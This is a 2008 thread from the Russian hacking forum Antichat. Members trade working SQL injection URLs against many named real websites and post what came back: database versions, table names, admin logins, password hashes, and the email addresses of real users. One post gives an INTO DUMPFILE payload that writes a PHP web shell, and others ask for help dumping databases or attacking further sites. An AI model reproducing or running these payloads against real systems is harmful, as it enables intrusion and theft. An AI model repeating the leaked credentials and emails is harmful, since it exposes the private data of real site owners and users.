Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
16.03.2008, 12:44
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Нашел сначала пассивную xss, но мне показалось что ресурс содержит еще баги, начал ковырять, в итоге :
Информация о ресурсе смотреть
Код:
http://www.ukrindustrial.com/job/?fuseaction=job_employer.viewVacancy&jvr_id=-11029+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x2F,email,pass),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+users+limit+2,10--
Последний раз редактировалось xcedz; 16.03.2008 в 12:54..
Причина: удачи ;)
|
|
|
16.03.2008, 20:38
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753
Репутация:
120
|
|
http://www.fdh.com/news/show.php?id=-52+union+select+1,concat_ws(char(58),user,password ),3,4,5+from+mysql.user+limit+0,10/*
fdhllp:4ee995d07a241a7b
http://www.falltvpreview.com/show.php?id=-134+union+select+1,2,3,4,concat_ws(char(58),TABLE_ SCHEMA,TABLE_NAME,COLUMN_NAME),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26+from+INFOR MATION_SCHEMA.COLUMNS+limit+1--
И такой вопрос какой запрос прописать чтобы создать дамп БД на falltvpreview.com
ну и в первом случае тоже
http://www.airsoftgun.ee/rus/show.php?object=news&mode=full&id=-120+union+select+1,user(),3,Version(),5,6,7+from+I NFORMATION_SCHEMA.COLUMNS+limit+1/*
d10641sa15260@194.204.33.8
5.0.32-Debian_7etch1-log
Последний раз редактировалось neon_fx; 16.03.2008 в 21:48..
|
|
|
|
16.03.2008, 20:50
|
|
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049
Репутация:
705
|
|
howtostudy.org
http://www.howtostudy.org/resources_skill.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4--
4.1.20:tribble@localhost:howtostudy
rabota.md
http://www.rabota.md/vacancies/vacancyCategory.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())--
5.0.45:coruptie@localhost:coruptie_rabota
adlogger_adblock
adlogger_channels
adlogger_logfiles
adlogger_users
id
username
password
admin
Id
login
pass
questions
CATEGORIES
RESUMES
VACANCIES
tbl_admin
id
username
password
full_name
is_active
tbl_category
tbl_member
Expirience
Resume
videology.ru
http://www.videology.ru/?id=1&sub=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5/*
5.0.22:videologyr_777@localhost:videologyr_777
Blocks
Booking
Category_inventory
Clients
Flats_category
Items
Organizations
Payments
Room_inventory
Room_prices
Rooms
Service_prices
Services
Users
user_id
login
password
fl_settings
fl_nsi
fl_price
fl_reception
fio
id
name
pass
level
adm_menu
anons
email
images
menu
news
phpbb_attach_quota
phpbb_attachments
http://www.videology.ru/?id=1&sub=-1+union+select+1,2,concat_ws(0x3a,name,pass,level) ,4,5+from+users+limit+0,1/*
alex:f1c1592588411002af340cbaedd6fc33:7 pass:777 mailto:alexvarlamov@yandex.ru
nickdemidov:381987d375be5b533fc11198005ab02d:0
eurekaeurope.com
http://www.eurekaeurope.com/en/tents.php?group=1&product=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 ,4,5/*
4.0.27:nigor@node14.cluster.nxs.nl:nigor
И такой вопрос какой запрос прописать чтобы создать дамп БД на falltvpreview.com
ну и в первом случае тоже
dumpfile
?id=-1+UNION+SELECT+null,0x66726f6d205b2063617368205d20 7768697468206c6f7665202929292929,null,null,null,nu ll+from+accounts+into+dumpfile+'/tmp/shell.php'/*
|
|
|
|
16.03.2008, 21:53
|
|
Познающий
Регистрация: 06.11.2007
Сообщений: 57
Провел на форуме:
2688963
Репутация:
272
|
|
zhuk.net
Код:
http://www.zhuk.net/archive/printyk.asp?aid=2973+or+1=@@version--
version Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
db_name() rcb
system_user rcb
Код:
http://www.zhuk.net/archive/printyk.asp?aid=2973+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
по началу в ручную доставал таблицы из information_schema.tables, но потом их количество стало напрягать..и я воспользовался дампером от Elekt'а
Код:
RegSubTR
mt_Referrers
mt_RobotLog
mt_Sessions
Questlines
AEventOpl
AEventSost
Aissue
AissueER
AissueNI
AissueTR
AissueYK
Anketa
AnketaAdv
AnketaBelarus
AnketaEmailSubscr
AnketaEmailSubscrTest
AnketaEvents
AnketaEventsPost
AnketaEventsProfiles
AnketaFinUsl
AnketaForum2002
AnketaIvr
AnketaKipr
AnketaKonkurs
AnketaMan
AnketaMoscow
AnketaPlans
AnketaPlans2
AnketaPlans20021
AnketaQuestions
AnketaReg
AnketaRfi
AnketaRostov
AnketaSamara
StatAccessLog
Messages
StatAccessIP
ArtCommCookie
Artcomments
mt_Users
Autorslist
Companieslist
tblZsearch
GuestbookNI
rcbforum
PartsNI
JournalName
SubscriptionPeriod
Person
Users
PartsTR
PartsYK
tblCategory
StatAccessSiteOld
tblForum
tblTopic
StatAccessSite
ConfaName
tblThread
Autors
PartsER
tblAuthor
Companies
GuestbookYK
Parts
GuestbookER
tblPMMessage
UKSpeek
Newsline
tblBuddyList
AnketaSi2
NewsSprings
tblConfiguration
tblDateTimeFormat
tblGroup
UsersRCBComp
tblPoll
Articles
tblPollChoice
AnketaSamara2
tblPollVote
tblEmailNotify
AnketaSi
tblPermissions
AnketaSouth
AnketaSwiss
AnketaTel
AnketaThailand
tblSession
AnketaTR
AnketaYK
tblGuestName
Banners
RegSubscription
tblSmut
Archiveinf
Employes
tblBanList
Guestbook
UsersRole
Koter1
Koter2
Koter3
MailBoxes
Numb
Partadengnew
syssegments
Partadnew
sysconstraints
Post
mt_Config
PostService
mt_Definitions
PostServiceTheme
mt_IPCountry
PostTemp
mt_Keywords
QuestCookie
mt_Names
mt_PageLog
RegSubYK
Regions
mt_PageNames
Questionary
RegSub
mt_ReferrerNames
Интересна таблица Users
Код:
http://www.zhuk.net/archive/printyk.asp?aid=2973+or+1=(SELECT+TOP+1+cast(idus+as+nvarchar)%2B%27%3A%27%2Bcast(UID+as+nvarchar)%2B%27%3A%27%2Bcast(PW+as+nvarchar)+FROM+USERS+WHERE+idus=1)--
Код:
1:admin:p3OK_+
2:sub:2WEdd&
Код:
http://www.zhuk.net/adminka.php
Должно быть админка, но от неё нет толку, ибо 403
sdigital.ru
Код:
http://www.sdigital.ru/view_product.asp?idProduct=3196&idCategory=14&idSubCategory=81+or+1=@@version--
version Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db_name() u93901
system_user u93901
имеются таблицы
Код:
News
Meta
Pages
Products
SubCategories
UsualCarts
SupProducts
Clients
Admin
Categories
Brands
Currencies
интересная таблица Admin
колонки login и pass
Код:
http://www.sdigital.ru/view_product.asp?idProduct=3196&idCategory=14&idSubCategory=81+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(pass+as+nvarchar)+FROM+Admin)--
Там всего один пользователь, а именно
админка
highrollerbonuses.com
Код:
http://www.highrollerbonuses.com/high_roller_casino.php?casid=900+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
version() 4.0.24_Debian-10sarge3-log
user() junior@localhost
database() junior
casinogenie.co.uk
Код:
http://www.casinogenie.co.uk/casino_review.php?casinoid=9999+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
version() 5.0.24a-Debian_1-log
user() root@localhost 
database() casinogenie
интересные таблицы
Код:
access_types
admins
admin_id
username
passwd
realname
email
is_active
campaigns
clients
suppliers
adminlogin
blog_author
novinkisezona.ru
Код:
http://www.novinkisezona.ru/show_cat2.php?grid=-20+union+select+concat(version(),0x3a,user(),0x3a,database())
version() 4.1.20-lk-log
user() novinkisez@localhost
database() novinkisez
nycpov.com
Код:
http://www.nycpov.com/vr_viewer.php?vrid=-5+union+select+1,convert(concat(version(),0x3a,user(),0x3a,database()),binary),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
version() 4.1.16-standard-log
user() elwood@zuma.dreamhost.com
database() nycpano
superdyke.com
Код:
http://www.superdyke.com/venueprofileview.php?ghid=-38+union+select+1,2,3,4,5,6,7,concat(version(),0x3a,user(),0x3a,database()),9/*
version() 4.0.27-standard-log
user() super_super@localhost
database() super_superdyke
dekalaser.ru
Код:
http://dekalaser.ru/products/index.php?prid=-9+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8
version() 5.0.45-log
user() u19010@10.10.223.211
database() u19010
galant-fasad.com.ua
Код:
http://galant-fasad.com.ua/content.php?prID=1'
version() 4.0.27-max-log
user() trialog3@v46.valuehost.ru
database() trialog3
planeta-sos.com
Код:
http://www.planeta-sos.com/goods.php?prid=999&rid=1+union+select+1,concat(version(),0x3a,user(),0x3a,database())
version() 4.1.21-log
user() planeta-soscom@81.177.16.51
database() planetasoscom_ssr
posterdb.de
Код:
http://www.posterdb.de/detailmovie.php?filmID=-366+union+select+concat(version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9/*
version() 5.0.22
user() web207@localhost
database() usr_web207_1
интересные таблицы
Код:
person
posteruser
outgroup_members
uni-cis.ru
Код:
http://www.uni-cis.ru/news2.php?nid=-358+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4
version() 4.0.23-standard
user() unicis_user@localhost
database() unicis_database
|
|
|
|
16.03.2008, 23:08
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662
Репутация:
435
|
|
Код:
http://www.electroportal.net/vis_directory.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(version(),0x3a,user(),0x3a,database()),10,11,12,13,14/*
5.0.32-enterprise-gpl-nt:electroportal@localhost:electroportal subdirectory
Вообще сайт ебанутый, с названиями таблиц по 3 слова =\
какой то ит. магазинчек
Код:
http://www.allemandi.com/dett_libri.php?id=-183+union+select+1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/*
6.0.2-alpha-community-nt-debug о_О я пропустил выпуск новой версии .. ?
Код:
http://www.extenzilla.it/scheda_estensione.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
5.0.24a-standard-log
есть таблица smf_members, дальше смотреть не стал
Код:
http://www.mpa-italia.it/press.php?id=-7+UNION+SELECT+1,2,3,4,5,6,7,8,9,version()/*
5.0.45 есть таблица letterit_user
но почему то по запросу
Код:
http://www.mpa-italia.it/press.php?id=-7+UNION+SELECT+1,2,3,4,5,6,7,8,9,table_schema+from+information_schema.tables+where+table_name=0x276C657474657269745F7573657227+limit+1,1/*
ниче нет, х3 че так. |
|
|
|
16.03.2008, 23:20
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
6.0.2-alpha-community-nt-debug о_О я пропустил выпуск новой версии .. ?
http://www.allemandi.com/dett_libri.php?id=-183+union+select+concat_ws(0x2F,user,password),2+f rom+mysql.user/*
di root/6bb8451457310b70, root/446fb65c7b4daabc, /, pma/78d9048427ff2bb3 мне шоха еще не попадалась , а жаль  хнык
|
|
|
|
16.03.2008, 23:25
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
порноресурс
http://www.largethumb.com/category.php?cat=qwert
поможете доработать?
|
|
|
|
16.03.2008, 23:27
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от ZET36
порноресурс
http://www.largethumb.com/category.php?cat=qwert
поможете доработать?
вопросы в другую ветку https://forum.antichat.ru/thread46016.html
|
|
|
|
17.03.2008, 02:28
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Парочка студий веб дизайна.
Дайте им свои деньги 
---------------------------------
Авторский сайт "Агарев Сергей", фрилансер походу
_http://www.agarev.com/website.php?id=99999999+and+1=2+union+select+1,con cat(user(),char(58),version(),char(58),database()) ,3,4/*
factorho_agarev@localhost:5.0.45-community:factorho_dbagarev
_http://www.agarev.com/website.php?id=99999999+and+1=2+union+select+1,2,c oncat(lgn,0x3a,pswd),4+from+agrv_user/*
agrv_admin:580c1c296bdae1e2
---------------------------------------
«Витрум-Медиа» Питер
_http://www.vitrum-media.ru/index.php?menu=49&iddoc=104+and+substring(version( ),1,1)=4
вывода нет подзапросы |
|
|
|
17.03.2008, 04:30
|
|
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049
Репутация:
705
|
|
pixheaven.net
http://www.pixheaven.net/galerie.php?id=-1+union+select+1,2,3,4,55,6,concat_ws(0x3a,version (),user(),database()),8,9--
sansihotels.com
http://www.sansihotels.com/hotels.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase())/*
5.0.22-Debian_0ubuntu6.06.6-log:sansihotels
columnists.com
http://columnists.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8/*
5.0.45-community:nsncsu2_members@localhost:nsncsu2_column ists
content
faq
forgot
members
memberid
oldMemberID
password
salutation
firstName
middleName
lastName
email
website1
address1Work
members_new
memberid
oldMemberID
password
salutation
newsletter_article
newsletter_edition
billing_type
c_ban_users
c_messages
c_reg_users
c_users
room
username
latin1
u_time
status
cd_payments
conference_payments
countries
members
1:$broder20071:70b9ba4648b497be AVID:
2:$dastor10003:7b9ccee24845e5b0 AVID:
3:$dreiman92037:7788a3c81c8c3794 AVID:
4:$hentoff10011:5f47e40e7ef5a35d:NAT: members_new
1:lucy.adams@augustaprep.org:2811994a09d6f1b5:LUCY :
2:lahern@ethocare.org:1489453207d628ef:LESLIE:
3:sralcorn@dejazzd.com:7956b65143aad206:SAM
|
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Комбинированный вид